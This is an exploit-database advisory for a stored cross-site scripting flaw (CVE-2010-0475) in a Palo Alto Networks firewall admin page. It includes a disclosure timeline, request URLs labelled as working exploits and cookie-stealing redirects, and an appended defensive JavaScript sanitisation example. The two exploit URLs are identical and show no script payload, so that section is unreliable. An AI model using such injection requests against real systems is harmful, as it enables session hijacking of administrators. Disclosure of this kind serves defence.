
Palo Alto Network Vulnerability - Cross-Site Scripting

Published: 19 May 2010 00:00:00
Reported by: Jeromie Jackson
Type: exploitdb
Source: www.exploit-db.com

Palo Alto Network XSS Vulnerability, CVE-2010-0475, Remote and Local, Patche

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2010-0475 | 19 May 2010 00:00 | circl |
| CVE | CVE-2010-0475 | 14 May 2010 19:24 | cve |
| Cvelist | CVE-2010-0475 | 14 May 2010 19:24 | cvelist |
| EUVD | EUVD-2010-0506 | 7 Oct 2025 00:30 | euvd |
| exploitpack | Palo Alto Network Vulnerability - Cross-Site Scripting | 19 May 2010 00:00 | exploitpack |
| NVD | CVE-2010-0475 | 14 May 2010 19:30 | nvd |
| Packet Storm | Palo Alto Network Cross Site Scripting | 14 May 2010 00:00 | packetstorm |
| Prion | Cross site scripting | 14 May 2010 19:30 | prion |
| securityvulns | Palo Alto Network Vulnerability - Cross-Site Scripting (XSS) | 13 May 2010 00:00 | securityvulns |
| seebug.org | Palo Alto Networks firewall esp/editUser.esp page stored cross-site scripting vulnerability | 18 May 2010 00:00 | seebug |

Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
------------------------------

Class: Cross-Site Scripting (XSS) Vulnerability
CVE: CVE-2010-0475
Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM
Timeline:
        Submission to MITRE: 1/18/2010
        Vendor Contact: 2/18/2010
        Vendor Response: 2/18/2010
        Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
        COBIT & ITIL Certified
        President- San Diego Open Web Application Security Project (OWASP)
        Vice President- San Diego Information Audit & Control Association (ISACA)
        SANS Mentor
        LinkedIn: www.linkedin.com/in/securityassessment
        Blog: www.JeromieJackson.com
        Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:
   Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo
Alto interface. By crafting a URL that includes XSS code, it is possible to
inject malicious data, redirect the user to a bogus replica of the real
website, or carry out other nefarious activity.

Exploit:
Single Line working-
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution:
A patch will be required from the vendor. It is recommended that a routine
to sanitize user input be consistently implemented throughout the
application to mitigate other such occurrences.
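
One way to apply the recommendation above, shown as an added example that is not part of the original advisory or the vendor's code: validate the stored fields against allow-lists on input and encode every stored value on output. The parameter names come from the URL above; the patterns, function names and sample inputs are assumptions.

```javascript
// Added illustration: parameter names come from the advisory's URL;
// the allow-list patterns and function names are assumptions.

// Allow-list patterns for the fields that are stored and later displayed.
const FIELD_RULES = new Map([
  ['origusername', /^[A-Za-z0-9._-]{1,31}$/],
  ['role', /^[a-z]{1,32}$/],
  ['deviceC', /^[A-Za-z0-9.-]{1,253}$/],
  ['vsysC', /^[A-Za-z0-9.\/-]{1,253}$/],
]);

// Input side: return the names of fields that are missing or off-pattern,
// so the request can be refused before anything is stored.
function rejectedFields(queryString) {
  const params = new URLSearchParams(queryString);
  const bad = [];
  for (const [name, rule] of FIELD_RULES) {
    const value = params.get(name);
    if (value === null || !rule.test(value)) bad.push(name);
  }
  return bad;
}

// Output side: encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

// Render a stored record. Every value is encoded even if it passed
// validation, because stored data may predate the validation rules.
function renderUserRow(record) {
  const cells = ['origusername', 'role', 'vsysC']
    .map((key) => `<td>${escapeHtml(record[key] ?? '')}</td>`);
  const user = escapeHtml(record.origusername ?? '');
  return `<tr data-user="${user}">${cells.join('')}</tr>`;
}

// Constructed sample inputs (not taken from the advisory).
const cleanQuery = 'mode=edit&origusername=test&deviceC=localhost.localdomain' +
  '&vsysC=localhost.localdomain%2Fvsys1&role=vsysadmin';
const markupQuery = cleanQuery.replace('role=vsysadmin',
  'role=' + encodeURIComponent('"><i>markup</i>'));
```

Encoding at render time is the layer that covers records already stored before validation was introduced; the input check alone does not.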



Vulners AI Score: 6.5 (Medium risk)
CVSS 2: 4.3
EPSS: 0.00198